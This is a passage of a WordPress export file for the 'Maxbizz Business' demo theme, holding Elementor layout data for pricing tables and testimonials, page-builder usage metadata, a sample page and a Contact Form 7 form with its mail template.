Sans"},"elements":[],"widgetType":"ipricingtable"}],"isInner":true},{"id":"1da4c28","elType":"column","settings":{"_column_size":33,"_inline_size":null,"_inline_size_tablet":100,"margin_tablet":{"unit":"%","top":"0","right":"25","bottom":"0","left":"25","isLinked":false},"margin_mobile":{"unit":"%","top":"0","right":"0","bottom":"0","left":"0","isLinked":false}},"elements":[{"id":"d81492b","elType":"widget","settings":{"title":"pro plan","price":"<sup>$<\/sup> 89","price_for":"month","short_text":"Discover the emerging technologies most relevant to your strategy by working.","details":"<ul><li class=\"active\">Support Your Business<\/li><li class=\"active\">Revoke Dokument Access<\/li><li class=\"active\">Detailed Risk Profiling<\/li>\n<li class=\"active\">Enter Unlimited Bils<\/li>\n<li class=\"active\">Bank Transactions<\/li>\n<li class=\"active\">Financial Strategy\n<\/li><\/ul>","label_link":"Choose Plane","price_typography_typography":"custom","price_typography_font_family":"Open Sans","btn_color":"#282828","hover_btn_color":"#FFFFFF"},"elements":[],"widgetType":"ipricingtable"}],"isInner":true}],"isInner":true},{"id":"8d092a9","elType":"section","settings":{"gap":"extended","structure":"30","css_classes":"yearly","layout":"full_width"},"elements":[{"id":"c5d69d2","elType":"column","settings":{"_column_size":33,"_inline_size":null,"_inline_size_tablet":50},"elements":[{"id":"571dec3","elType":"widget","settings":{"title":"basic plan","price":"<sup>$<\/sup> 699","price_for":"year","short_text":"Discover the emerging technologies most relevant to your strategy by working.","details":"<ul><li class=\"active\">Support Your Business<\/li><li class=\"active\">Revoke Dokument Access<\/li><li class=\"active\">Detailed Risk Profiling<\/li>\n<li class=\"active\">Enter Unlimited Bils<\/li>\n<li>Bank Transactions<\/li>\n<li>Financial Strategy\n<\/li><\/ul>","label_link":"Choose Plane","_padding_tablet":{"unit":"px","top":"0","right":"0","bottom":"30","left":"0","isLinked":false},"price_typography_typography":"custom","price_typography_font_family":"Open Sans","btn_color":"#282828","hover_btn_color":"#FFFFFF"},"elements":[],"widgetType":"ipricingtable"}],"isInner":true},{"id":"97dd2e0","elType":"column","settings":{"_column_size":33,"_inline_size":null,"_inline_size_tablet":50},"elements":[{"id":"c36db20","elType":"widget","settings":{"is_featured":"yes","title":"ultra plan","price":"<sup>$<\/sup> 799","price_for":"year","short_text":"Discover the emerging technologies most relevant to your strategy by working.","details":"<ul><li class=\"active\">Support Your Business<\/li><li class=\"active\">Revoke Dokument Access<\/li><li class=\"active\">Detailed Risk Profiling<\/li>\n<li class=\"active\">Enter Unlimited Bils<\/li>\n<li class=\"active\">Bank Transactions<\/li>\n<li>Financial Strategy\n<\/li><\/ul>","label_link":"Choose Plane","_padding_tablet":{"unit":"px","top":"0","right":"0","bottom":"30","left":"0","isLinked":false},"price_typography_typography":"custom","price_typography_font_family":"Open Sans"},"elements":[],"widgetType":"ipricingtable"}],"isInner":true},{"id":"f16cdf4","elType":"column","settings":{"_column_size":33,"_inline_size":null,"_inline_size_tablet":100,"margin_tablet":{"unit":"%","top":"0","right":"25","bottom":"0","left":"25","isLinked":false},"margin_mobile":{"unit":"%","top":"0","right":"0","bottom":"0","left":"0","isLinked":false}},"elements":[{"id":"52498ac","elType":"widget","settings":{"title":"pro plan","price":"<sup>$<\/sup> 899","price_for":"year","short_text":"Discover the emerging technologies most relevant to your strategy by working.","details":"<ul><li class=\"active\">Support Your Business<\/li><li class=\"active\">Revoke Dokument Access<\/li><li class=\"active\">Detailed Risk Profiling<\/li>\n<li class=\"active\">Enter Unlimited Bils<\/li>\n<li class=\"active\">Bank Transactions<\/li>\n<li class=\"active\">Financial Strategy\n<\/li><\/ul>","label_link":"Choose Plane","price_typography_typography":"custom","price_typography_font_family":"Open Sans","btn_color":"#282828","hover_btn_color":"#FFFFFF"},"elements":[],"widgetType":"ipricingtable"}],"isInner":true}],"isInner":true}],"isInner":false}],"isInner":false},{"id":"5ea13f4","elType":"section","settings":{"padding":{"unit":"px","top":"120","right":"0","bottom":"120","left":"0","isLinked":false}},"elements":[{"id":"a4edcab","elType":"column","settings":{"_column_size":100,"_inline_size":null},"elements":[{"id":"f91fb7c","elType":"widget","settings":{"image_carousel":[{"_id":"46a0442","title":"","image_partner":{"url":"https:\/\/maxbizz.s3.amazonaws.com\/images\/01.svg","id":2008},"image_link":{"url":"#","is_external":"","nofollow":"","custom_attributes":""}},{"_id":"24adf3d","title":"","image_partner":{"url":"https:\/\/maxbizz.s3.amazonaws.com\/images\/02.svg","id":2009},"image_link":{"url":"#","is_external":"","nofollow":"","custom_attributes":""}},{"_id":"90b7ac2","title":"","image_partner":{"url":"https:\/\/maxbizz.s3.amazonaws.com\/images\/03.svg","id":2010},"image_link":{"url":"#","is_external":"","nofollow":"","custom_attributes":""}},{"title":"","image_partner":{"url":"https:\/\/maxbizz.s3.amazonaws.com\/images\/04.svg","id":2011},"image_link":{"url":"#","is_external":"","nofollow":"","custom_attributes":""},"_id":"cb5bb18"},{"title":"","image_partner":{"url":"https:\/\/maxbizz.s3.amazonaws.com\/images\/05.svg","id":2012},"image_link":{"url":"#","is_external":"","nofollow":"","custom_attributes":""},"_id":"e595c69"},{"title":"","image_partner":{"url":"https:\/\/maxbizz.s3.amazonaws.com\/images\/06.svg","id":2013},"image_link":{"url":"#","is_external":"","nofollow":"","custom_attributes":""},"_id":"6fa2f0f"}],"tshow":"6","tshow_tablet":"4","dots":"false","img_spacing":{"unit":"px","size":80,"sizes":[]},"img_css_filters_hover_css_filter":"custom","img_css_filters_hover_brightness":{"unit":"px","size":0,"sizes":[]}},"elements":[],"widgetType":"iclogos"}],"isInner":false}],"isInner":false},{"id":"bc9f39f","elType":"section","settings":{"background_background":"classic","background_color":"#F8F8F8","background_image":{"url":"https:\/\/maxbizz.s3.amazonaws.com\/images\/bg1-service-grid.jpg","id":1993},"background_position":"center center","background_repeat":"no-repeat","background_size":"cover","background_bg_width_tablet":{"unit":"px","size":0,"sizes":[]},"padding":{"unit":"px","top":"150","right":"0","bottom":"120","left":"0","isLinked":false},"gap":"extended","structure":"20","background_position_tablet":"center right","padding_mobile":{"unit":"px","top":"60","right":"0","bottom":"60","left":"0","isLinked":false}},"elements":[{"id":"138f2cc","elType":"column","settings":{"_column_size":50,"_inline_size":null},"elements":[],"isInner":false},{"id":"3ac4ab2","elType":"column","settings":{"_column_size":50,"_inline_size":null,"_inline_size_tablet":100},"elements":[{"id":"6db8a68","elType":"widget","settings":{"sub":"testimonials","title":"What People Say About Us","header_size":"h3","_padding":{"unit":"px","top":"0","right":"0","bottom":"18","left":"0","isLinked":false},"stitle_bg":"#4B83FC1A","title_typography_typography":"custom","title_typography_font_size_mobile":{"unit":"px","size":30,"sizes":[]},"is_highlight":"","stitle_typography_typography":"custom","stitle_typography_font_family":"Raleway","stitle_typography_font_size":{"unit":"px","size":14,"sizes":[]},"stitle_typography_font_weight":"600"},"elements":[],"widgetType":"iheading"},{"id":"f2222f4","elType":"widget","settings":{"align":"left","testi_slider":[{"tcontent":"\u201cWe know a diverse workforce and an inclusive culture matters to our clients. Through philanthropy and employee volunteerism, we support the diverse communities where our employees live.\u201d","timage":{"url":"","id":""},"tname":"Oliver Simson","tjob":"client of company","_id":"4071f49"},{"tcontent":"\"I am so happy, my dear friend, so absorbed in the exquisite sense of mere tranquil existence, that I neglect my talents. I should be incapable of drawing a single stroke at the present moment.\"","timage":{"url":"","id":""},"tname":"Mary Grey","tjob":"client of company","_id":"0a8366e"},{"tcontent":"\"I am so happy, my dear friend, so absorbed in the exquisite sense of mere tranquil existence, that I neglect my talents. I should be incapable of drawing a single stroke at the present moment.\"","timage":{"url":"","id":""},"tname":"Samanta Fox","tjob":"client of company","_id":"aeffe7c"}],"dots_style":"vertical","dots_spacing":{"unit":"px","size":-300,"sizes":[]},"dots_spacing_tablet":{"unit":"px","size":-70,"sizes":[]},"_margin":{"unit":"%","top":"0","right":"-5","bottom":"0","left":"0","isLinked":false},"arrow_align":"bottom","_padding_tablet":{"unit":"px","top":"0","right":"70","bottom":"0","left":"0","isLinked":false},"_padding_mobile":{"unit":"px","top":"0","right":"0","bottom":"0","left":"0","isLinked":false},"job_color":"#8D8D8D","job_typography_typography":"custom","job_typography_font_family":"Raleway","job_typography_font_size":{"unit":"px","size":14,"sizes":[]},"job_typography_font_weight":"500"},"elements":[],"widgetType":"itestimonials2"}],"isInner":false}],"isInner":false},{"id":"8cad2b7","elType":"section","settings":{"padding":{"unit":"px","top":"115","right":"0","bottom":"120","left":"0","isLinked":false},"padding_mobile":{"unit":"px","top":"60","right":"0","bottom":"60","left":"0","isLinked":false}},"elements":[{"id":"23c2559","elType":"column","settings":{"_column_size":100,"_inline_size":null},"elements":[{"id":"f3130ab","elType":"section","settings":{"structure":"30","padding":{"unit":"px","top":"0","right":"0","bottom":"40","left":"0","isLinked":false},"layout":"full_width"},"elements":[{"id":"7f0c435","elType":"column","settings":{"_column_size":33,"_inline_size":21,"_inline_size_tablet":10},"elements":[],"isInner":true},{"id":"45f2ad9","elType":"column","settings":{"_column_size":33,"_inline_size":57.33200000000000073896444519050419330596923828125,"_inline_size_tablet":80},"elements":[{"id":"5c88d8c","elType":"widget","settings":{"sub":"our blog","title":"Read Our Latest Insights","header_size":"h3","align":"center","_padding":{"unit":"px","top":"0","right":"0","bottom":"20","left":"0","isLinked":false},"is_highlight":"","stitle_typography_typography":"custom","stitle_typography_font_family":"Raleway","stitle_typography_font_size":{"unit":"px","size":14,"sizes":[]},"stitle_typography_font_weight":"600"},"elements":[],"widgetType":"iheading"},{"id":"4f3156a","elType":"widget","settings":{"editor":"<p>We help you see the world differently, discover opportunities you may never have imagined and achieve results that bridge what is with what can be.<\/p>","align":"center","text_color":"#5F5F5F"},"elements":[],"widgetType":"text-editor"}],"isInner":true},{"id":"5be0c29","elType":"column","settings":{"_column_size":33,"_inline_size":21,"_inline_size_tablet":10},"elements":[],"isInner":true}],"isInner":true},{"id":"6d97bcf","elType":"widget","settings":{"post_num":3,"dots":"false","_padding":{"unit":"px","top":"0","right":"0","bottom":"60","left":"0","isLinked":false}},"elements":[],"widgetType":"ipostcarousel"},{"id":"c2b725e","elType":"widget","settings":{"align":"center","text":"view all","link":{"url":"http:\/\/wpdemo.archiwp.com\/maxbizz-business\/blog\/","is_external":"","nofollow":"","custom_attributes":""}},"elements":[],"widgetType":"ibutton"}],"isInner":false}],"isInner":false}]]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[_elementor_controls_usage]]></wp:meta_key>
		<wp:meta_value><![CDATA[a:20:{s:17:"slider_revolution";a:3:{s:5:"count";i:1;s:15:"control_percent";i:1;s:8:"controls";a:1:{s:7:"content";a:1:{s:15:"content_section";a:2:{s:14:"revslidertitle";i:1;s:9:"shortcode";i:1;}}}}s:6:"column";a:3:{s:5:"count";i:44;s:15:"control_percent";i:0;s:8:"controls";a:3:{s:6:"layout";a:1:{s:6:"layout";a:3:{s:12:"_inline_size";i:44;s:19:"_inline_size_tablet";i:32;s:19:"_inline_size_mobile";i:4;}}s:8:"advanced";a:2:{s:16:"section_advanced";a:4:{s:13:"margin_tablet";i:5;s:13:"margin_mobile";i:5;s:6:"margin";i:2;s:14:"padding_mobile";i:1;}s:19:"_section_responsive";a:2:{s:11:"hide_tablet";i:1;s:11:"hide_mobile";i:1;}}s:5:"style";a:2:{s:14:"section_border";a:4:{s:13:"border_border";i:1;s:12:"border_width";i:1;s:19:"border_width_mobile";i:1;s:12:"border_color";i:1;}s:13:"section_style";a:2:{s:21:"background_background";i:1;s:16:"background_color";i:1;}}}}s:7:"section";a:3:{s:5:"count";i:22;s:15:"control_percent";i:1;s:8:"controls";a:3:{s:8:"advanced";a:1:{s:16:"section_advanced";a:8:{s:6:"margin";i:3;s:13:"margin_tablet";i:1;s:7:"z_index";i:1;s:14:"padding_tablet";i:5;s:14:"padding_mobile";i:10;s:7:"padding";i:12;s:13:"margin_mobile";i:1;s:11:"css_classes";i:3;}}s:6:"layout";a:2:{s:14:"section_layout";a:4:{s:6:"layout";i:11;s:3:"gap";i:13;s:16:"content_position";i:2;s:13:"content_width";i:1;}s:17:"section_structure";a:1:{s:9:"structure";i:14;}}s:5:"style";a:2:{s:18:"section_background";a:8:{s:21:"background_background";i:5;s:16:"background_color";i:4;s:16:"background_image";i:2;s:19:"background_position";i:2;s:17:"background_repeat";i:2;s:15:"background_size";i:1;s:26:"background_bg_width_tablet";i:1;s:26:"background_position_tablet";i:1;}s:26:"section_background_overlay";a:1:{s:18:"overlay_blend_mode";i:1;}}}}s:9:"iiconbox1";a:3:{s:5:"count";i:3;s:15:"control_percent";i:4;s:8:"controls";a:3:{s:7:"content";a:1:{s:15:"content_section";a:4:{s:9:"icon_font";i:3;s:5:"title";i:3;s:3:"des";i:3;s:4:"link";i:3;}}s:5:"style";a:2:{s:17:"style_box_section";a:6:{s:6:"bg_box";i:3;s:12:"bg_hover_box";i:3;s:19:"bg_hover_icon_color";i:3;s:16:"bg_hover_icon_bg";i:3;s:18:"bg_hover_des_color";i:3;s:23:"bg_hover_link_btn_color";i:3;}s:18:"style_icon_section";a:2:{s:9:"icon_size";i:3;s:7:"icon_bg";i:3;}}s:8:"advanced";a:1:{s:14:"_section_style";a:1:{s:14:"_margin_tablet";i:2;}}}}s:8:"iheading";a:3:{s:5:"count";i:7;s:15:"control_percent";i:4;s:8:"controls";a:3:{s:7:"content";a:1:{s:15:"content_section";a:4:{s:3:"sub";i:6;s:5:"title";i:7;s:11:"header_size";i:5;s:5:"align";i:3;}}s:8:"advanced";a:1:{s:14:"_section_style";a:3:{s:8:"_padding";i:6;s:7:"_margin";i:1;s:14:"_margin_tablet";i:1;}}s:5:"style";a:1:{s:13:"style_section";a:11:{s:9:"stitle_bg";i:4;s:28:"stitle_typography_typography";i:7;s:29:"stitle_typography_font_family";i:6;s:27:"stitle_typography_font_size";i:7;s:29:"stitle_typography_font_weight";i:6;s:29:"stitle_typography_line_height";i:1;s:19:"stitle_bottom_space";i:1;s:27:"title_typography_typography";i:3;s:33:"title_typography_font_size_mobile";i:3;s:11:"title_color";i:2;s:12:"stitle_color";i:1;}}}}s:11:"text-editor";a:3:{s:5:"count";i:7;s:15:"control_percent";i:1;s:8:"controls";a:3:{s:7:"content";a:1:{s:14:"section_editor";a:1:{s:6:"editor";i:7;}}s:8:"advanced";a:1:{s:14:"_section_style";a:4:{s:8:"_padding";i:3;s:15:"_padding_mobile";i:1;s:7:"_margin";i:1;s:14:"_margin_tablet";i:1;}}s:5:"style";a:1:{s:13:"section_style";a:7:{s:10:"text_color";i:6;s:21:"typography_typography";i:1;s:22:"typography_font_family";i:2;s:20:"typography_font_size";i:1;s:22:"typography_font_weight";i:2;s:25:"typography_text_transform";i:1;s:5:"align";i:3;}}}}s:5:"image";a:3:{s:5:"count";i:3;s:15:"control_percent";i:1;s:8:"controls";a:3:{s:7:"content";a:1:{s:13:"section_image";a:4:{s:5:"image";i:3;s:10:"image_size";i:3;s:5:"align";i:1;s:12:"align_tablet";i:1;}}s:8:"advanced";a:1:{s:14:"_section_style";a:3:{s:15:"_padding_tablet";i:1;s:15:"_padding_mobile";i:1;s:14:"_margin_mobile";i:1;}}s:5:"style";a:1:{s:19:"section_style_image";a:2:{s:12:"width_tablet";i:1;s:19:"image_border_radius";i:1;}}}}s:7:"heading";a:3:{s:5:"count";i:1;s:15:"control_percent";i:2;s:8:"controls";a:2:{s:7:"content";a:1:{s:13:"section_title";a:2:{s:5:"title";i:1;s:11:"header_size";i:1;}}s:5:"style";a:1:{s:19:"section_title_style";a:2:{s:22:"typography_font_family";i:1;s:22:"typography_font_weight";i:1;}}}}s:9:"iiconbox2";a:3:{s:5:"count";i:4;s:15:"control_percent";i:7;s:8:"controls";a:3:{s:7:"content";a:1:{s:15:"content_section";a:4:{s:9:"box_style";i:4;s:9:"icon_font";i:4;s:5:"title";i:4;s:3:"des";i:4;}}s:5:"style";a:3:{s:17:"style_box_section";a:9:{s:10:"icon_color";i:4;s:7:"icon_bg";i:4;s:6:"bg_box";i:4;s:30:"box_box_shadow_box_shadow_type";i:4;s:25:"box_box_shadow_box_shadow";i:4;s:12:"bg_hover_box";i:4;s:9:"des_color";i:4;s:32:"hover_box_shadow_box_shadow_type";i:4;s:27:"hover_box_shadow_box_shadow";i:4;}s:18:"style_icon_section";a:2:{s:13:"icon_bg_width";i:4;s:9:"icon_size";i:1;}s:21:"style_content_section";a:4:{s:15:"content_padding";i:4;s:27:"title_typography_typography";i:4;s:26:"title_typography_font_size";i:4;s:22:"content_padding_mobile";i:4;}}s:8:"advanced";a:1:{s:14:"_section_style";a:2:{s:7:"_margin";i:2;s:14:"_margin_mobile";i:3;}}}}s:6:"button";a:3:{s:5:"count";i:1;s:15:"control_percent";i:5;s:8:"controls";a:2:{s:7:"content";a:1:{s:14:"section_button";a:3:{s:4:"text";i:1;s:4:"link";i:1;s:5:"align";i:1;}}s:5:"style";a:1:{s:13:"section_style";a:8:{s:21:"typography_typography";i:1;s:22:"typography_font_family";i:1;s:20:"typography_font_size";i:1;s:22:"typography_font_weight";i:1;s:25:"typography_text_transform";i:1;s:17:"button_text_color";i:1;s:16:"background_color";i:1;s:12:"text_padding";i:1;}}}}s:9:"iprogress";a:3:{s:5:"count";i:3;s:15:"control_percent";i:2;s:8:"controls";a:3:{s:7:"content";a:1:{s:15:"content_section";a:2:{s:5:"title";i:3;s:7:"percent";i:3;}}s:5:"style";a:2:{s:17:"bar_style_section";a:2:{s:8:"bg_color";i:3;s:10:"lbar_color";i:3;}s:18:"style_text_section";a:2:{s:11:"title_color";i:3;s:6:"per_bg";i:3;}}s:8:"advanced";a:1:{s:14:"_section_style";a:2:{s:8:"_padding";i:2;s:15:"_padding_tablet";i:2;}}}}s:11:"ivideopopup";a:3:{s:5:"count";i:1;s:15:"control_percent";i:5;s:8:"controls";a:3:{s:7:"content";a:1:{s:15:"content_section";a:1:{s:5:"vlink";i:1;}}s:5:"style";a:1:{s:13:"style_section";a:4:{s:9:"btn_width";i:1;s:16:"btn_width_mobile";i:1;s:9:"btn_color";i:1;s:10:"btn_circle";i:1;}}s:8:"advanced";a:2:{s:14:"_section_style";a:2:{s:7:"_margin";i:1;s:14:"_margin_mobile";i:1;}s:17:"_section_position";a:4:{s:14:"_element_width";i:1;s:9:"_position";i:1;s:9:"_offset_x";i:1;s:9:"_offset_y";i:1;}}}}s:13:"iiboxcarousel";a:3:{s:5:"count";i:1;s:15:"control_percent";i:3;s:8:"controls";a:2:{s:7:"content";a:1:{s:15:"content_section";a:8:{s:5:"align";i:1;s:11:"image_boxes";i:1;s:5:"tshow";i:1;s:4:"dots";i:1;s:4:"loop";i:1;s:12:"tshow_tablet";i:1;s:8:"autoplay";i:1;s:7:"timeout";i:1;}}s:8:"advanced";a:1:{s:14:"_section_style";a:1:{s:8:"_padding";i:1;}}}}s:8:"icounter";a:3:{s:5:"count";i:4;s:15:"control_percent";i:6;s:8:"controls";a:3:{s:7:"content";a:1:{s:15:"content_section";a:2:{s:5:"title";i:4;s:6:"number";i:4;}}s:8:"advanced";a:1:{s:14:"_section_style";a:1:{s:15:"_padding_tablet";i:2;}}s:5:"style";a:1:{s:21:"style_content_section";a:11:{s:28:"number_typography_typography";i:4;s:34:"number_typography_font_size_mobile";i:4;s:18:"title_space_mobile";i:4;s:27:"title_typography_typography";i:4;s:33:"title_typography_font_size_mobile";i:4;s:29:"number_typography_font_family";i:4;s:27:"number_typography_font_size";i:4;s:29:"number_typography_font_weight";i:4;s:28:"title_typography_font_family";i:4;s:28:"title_typography_font_weight";i:4;s:28:"title_typography_line_height";i:4;}}}}s:9:"iswitcher";a:3:{s:5:"count";i:1;s:15:"control_percent";i:2;s:8:"controls";a:2:{s:7:"content";a:1:{s:15:"content_section";a:2:{s:10:"title_left";i:1;s:11:"title_right";i:1;}}s:5:"style";a:1:{s:18:"style_icon_section";a:2:{s:11:"title_color";i:1;s:9:"toggle_bg";i:1;}}}}s:13:"ipricingtable";a:3:{s:5:"count";i:6;s:15:"control_percent";i:2;s:8:"controls";a:3:{s:7:"content";a:1:{s:15:"content_section";a:5:{s:5:"title";i:6;s:5:"price";i:6;s:9:"price_for";i:6;s:7:"details";i:6;s:11:"is_featured";i:2;}}s:8:"advanced";a:1:{s:14:"_section_style";a:1:{s:15:"_padding_tablet";i:4;}}s:5:"style";a:1:{s:21:"style_content_section";a:5:{s:28:"title_typography_font_family";i:1;s:27:"price_typography_typography";i:6;s:28:"price_typography_font_family";i:6;s:9:"btn_color";i:4;s:15:"hover_btn_color";i:4;}}}}s:7:"iclogos";a:3:{s:5:"count";i:1;s:15:"control_percent";i:3;s:8:"controls";a:2:{s:7:"content";a:1:{s:15:"content_section";a:4:{s:14:"image_carousel";i:1;s:5:"tshow";i:1;s:12:"tshow_tablet";i:1;s:4:"dots";i:1;}}s:5:"style";a:1:{s:19:"image_style_section";a:3:{s:11:"img_spacing";i:1;s:32:"img_css_filters_hover_css_filter";i:1;s:32:"img_css_filters_hover_brightness";i:1;}}}}s:14:"itestimonials2";a:3:{s:5:"count";i:1;s:15:"control_percent";i:5;s:8:"controls";a:3:{s:7:"content";a:1:{s:20:"section_testimonials";a:4:{s:5:"align";i:1;s:12:"testi_slider";i:1;s:10:"dots_style";i:1;s:11:"arrow_align";i:1;}}s:5:"style";a:2:{s:18:"navigation_section";a:2:{s:12:"dots_spacing";i:1;s:19:"dots_spacing_tablet";i:1;}s:11:"style_tinfo";a:5:{s:9:"job_color";i:1;s:25:"job_typography_typography";i:1;s:26:"job_typography_font_family";i:1;s:24:"job_typography_font_size";i:1;s:26:"job_typography_font_weight";i:1;}}s:8:"advanced";a:1:{s:14:"_section_style";a:3:{s:7:"_margin";i:1;s:15:"_padding_tablet";i:1;s:15:"_padding_mobile";i:1;}}}}s:13:"ipostcarousel";a:3:{s:5:"count";i:1;s:15:"control_percent";i:1;s:8:"controls";a:2:{s:7:"content";a:1:{s:15:"content_section";a:2:{s:8:"post_num";i:1;s:4:"dots";i:1;}}s:8:"advanced";a:1:{s:14:"_section_style";a:1:{s:8:"_padding";i:1;}}}}s:7:"ibutton";a:3:{s:5:"count";i:1;s:15:"control_percent";i:1;s:8:"controls";a:1:{s:7:"content";a:1:{s:14:"button_section";a:3:{s:5:"align";i:1;s:4:"text";i:1;s:4:"link";i:1;}}}}}]]></wp:meta_value>
		</wp:postmeta>
							</item>
					<item>
		<title>My account</title>
		<link>http://wpdemo.archiwp.com/maxbizz-business/my-account/</link>
		<pubDate>Thu, 01 Oct 2020 10:12:45 +0000</pubDate>
		<dc:creator><![CDATA[admin]]></dc:creator>
		<guid isPermaLink="false">http://wpdemo.archiwp.com/maxbizz/my-account/</guid>
		<description></description>
		<content:encoded><![CDATA[<!-- wp:shortcode -->[woocommerce_my_account]<!-- /wp:shortcode -->]]></content:encoded>
		<excerpt:encoded><![CDATA[]]></excerpt:encoded>
		<wp:post_id>1167</wp:post_id>
		<wp:post_date><![CDATA[2020-10-01 10:12:45]]></wp:post_date>
		<wp:post_date_gmt><![CDATA[2020-10-01 10:12:45]]></wp:post_date_gmt>
		<wp:comment_status><![CDATA[closed]]></wp:comment_status>
		<wp:ping_status><![CDATA[closed]]></wp:ping_status>
		<wp:post_name><![CDATA[my-account]]></wp:post_name>
		<wp:status><![CDATA[publish]]></wp:status>
		<wp:post_parent>0</wp:post_parent>
		<wp:menu_order>0</wp:menu_order>
		<wp:post_type><![CDATA[page]]></wp:post_type>
		<wp:post_password><![CDATA[]]></wp:post_password>
		<wp:is_sticky>0</wp:is_sticky>
														</item>
					<item>
		<title>Sample Page</title>
		<link>http://wpdemo.archiwp.com/maxbizz-business/sample-page-2__trashed/</link>
		<pubDate>Fri, 16 Oct 2020 09:32:03 +0000</pubDate>
		<dc:creator><![CDATA[admin]]></dc:creator>
		<guid isPermaLink="false">http://wpdemo.archiwp.com/maxbizz-consulting/?page_id=2</guid>
		<description></description>
		<content:encoded><![CDATA[<!-- wp:paragraph -->
<p>This is an example page. It's different from a blog post because it will stay in one place and will show up in your site navigation (in most themes). Most people start with an About page that introduces them to potential site visitors. It might say something like this:</p>
<!-- /wp:paragraph -->

<!-- wp:quote -->
<blockquote class="wp-block-quote"><p>Hi there! I'm a bike messenger by day, aspiring actor by night, and this is my website. I live in Los Angeles, have a great dog named Jack, and I like pi&#241;a coladas. (And gettin' caught in the rain.)</p></blockquote>
<!-- /wp:quote -->

<!-- wp:paragraph -->
<p>...or something like this:</p>
<!-- /wp:paragraph -->

<!-- wp:quote -->
<blockquote class="wp-block-quote"><p>The XYZ Doohickey Company was founded in 1971, and has been providing quality doohickeys to the public ever since. Located in Gotham City, XYZ employs over 2,000 people and does all kinds of awesome things for the Gotham community.</p></blockquote>
<!-- /wp:quote -->

<!-- wp:paragraph -->
<p>As a new WordPress user, you should go to <a href="http://wpdemo.archiwp.com/maxbizz-consulting/wp-admin/">your dashboard</a> to delete this page and create new pages for your content. Have fun!</p>
<!-- /wp:paragraph -->]]></content:encoded>
		<excerpt:encoded><![CDATA[]]></excerpt:encoded>
		<wp:post_id>1535</wp:post_id>
		<wp:post_date><![CDATA[2020-10-16 09:32:03]]></wp:post_date>
		<wp:post_date_gmt><![CDATA[2020-10-16 09:32:03]]></wp:post_date_gmt>
		<wp:comment_status><![CDATA[closed]]></wp:comment_status>
		<wp:ping_status><![CDATA[open]]></wp:ping_status>
		<wp:post_name><![CDATA[sample-page-2__trashed]]></wp:post_name>
		<wp:status><![CDATA[trash]]></wp:status>
		<wp:post_parent>0</wp:post_parent>
		<wp:menu_order>0</wp:menu_order>
		<wp:post_type><![CDATA[page]]></wp:post_type>
		<wp:post_password><![CDATA[]]></wp:post_password>
		<wp:is_sticky>0</wp:is_sticky>
														<wp:postmeta>
		<wp:meta_key><![CDATA[_wp_page_template]]></wp:meta_key>
		<wp:meta_value><![CDATA[default]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[_wp_trash_meta_status]]></wp:meta_key>
		<wp:meta_value><![CDATA[publish]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[_wp_trash_meta_time]]></wp:meta_key>
		<wp:meta_value><![CDATA[1609236259]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[_wp_desired_post_slug]]></wp:meta_key>
		<wp:meta_value><![CDATA[sample-page-2]]></wp:meta_value>
		</wp:postmeta>
							</item>
					<item>
		<title>Contact form 1</title>
		<link>http://wpdemo.archiwp.com/maxbizz-business/?post_type=wpcf7_contact_form&#038;p=5</link>
		<pubDate>Mon, 02 Nov 2020 03:58:36 +0000</pubDate>
		<dc:creator><![CDATA[admin]]></dc:creator>
		<guid isPermaLink="false">http://wpdemo.archiwp.com/maxbizz-business/?post_type=wpcf7_contact_form&#038;p=5</guid>
		<description></description>
		<content:encoded><![CDATA[<label> Your Name (required)
    [text* your-name] </label>

<label> Your Email (required)
    [email* your-email] </label>

<label> Subject
    [text your-subject] </label>

<label> Your Message
    [textarea your-message] </label>

[submit "Send"]
Maxbizz Business "[your-subject]"
Maxbizz Business <wordpress@wpdemo.archiwp.com>
From: [your-name] <[your-email]>
Subject: [your-subject]

Message Body:
[your-message]

-- 
This e-mail was sent from a contact form on Maxbizz Business (http://wpdemo.archiwp.com/maxbizz-business)
support@oceanthemes.net
Reply-To: [your-email]

0
0

Maxbizz Business "[your-subject]"
Maxbizz Business <wordpress@wpdemo.archiwp.com>
Message Body:
[your-message]

-- 
This e-mail was sent from a contact form on Maxbizz Business (http://wpdemo.archiwp.com/maxbizz-business)
[your-email]
Reply-To: support@oceanthemes.net

0
0
Thank you for your message. It has been sent.
There was an error trying to send your message. Please try again later.
One or more fields have an error. Please check and try again.
There was an error trying to send your message. Please try again later.
You must accept the terms and conditions before sending your message.
The field is required.
The field is too long.
The field is too short.
The date format is incorrect.
The date is before the earliest one allowed.
The date is after the latest one allowed.
There was an unknown error uploading the file.
You are not allowed to upload files of this type.
The file is too big.
There was an error uploading the file.
The number format is invalid.
The number is smaller than the minimum allowed.
The number is larger than the maximum allowed.
The answer to the quiz is incorrect.
Your entered code is incorrect.
The e-mail address entered is invalid.
The URL is invalid.
The telephone number is invalid.]]></content:encoded>
		<excerpt:encoded><![CDATA[]]></excerpt:encoded>
		<wp:post_id>5</wp:post_id>
		<wp:post_date><![CDATA[2020-11-02 03:58:36]]></wp:post_date>
		<wp:post_date_gmt><![CDATA[2020-11-02 03:58:36]]></wp:post_date_gmt>
		<wp:comment_status><![CDATA[closed]]></wp:comment_status>
		<wp:ping_status><![CDATA[closed]]></wp:ping_status>
		<wp:post_name><![CDATA[contact-form-1]]></wp:post_name>
		<wp:status><![CDATA[publish]]></wp:status>
		<wp:post_parent>0</wp:post_parent>
		<wp:menu_order>0</wp:menu_order>
		<wp:post_type><![CDATA[wpcf7_contact_form]]></wp:post_type>
		<wp:post_password><![CDATA[]]></wp:post_password>
		<wp:is_sticky>0</wp:is_sticky>
														<wp:postmeta>
		<wp:meta_key><![CDATA[_form]]></wp:meta_key>
		<wp:meta_value><![CDATA[<label> Your Name (required)
    [text* your-name] </label>

<label> Your Email (required)
    [email* your-email] </label>

<label> Subject
    [text your-subject] </label>

<label> Your Message
    [textarea your-message] </label>

[submit "Send"]]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[_mail]]></wp:meta_key>
		<wp:meta_value><![CDATA[a:8:{s:7:"subject";s:33:"Maxbizz Business "[your-subject]"";s:6:"sender";s:47:"Maxbizz Business <wordpress@wpdemo.archiwp.com>";s:4:"body";s:197:"From: [your-name] <[your-email]>
Subject: [your-subject]

Message Body:
[your-message]

-- 
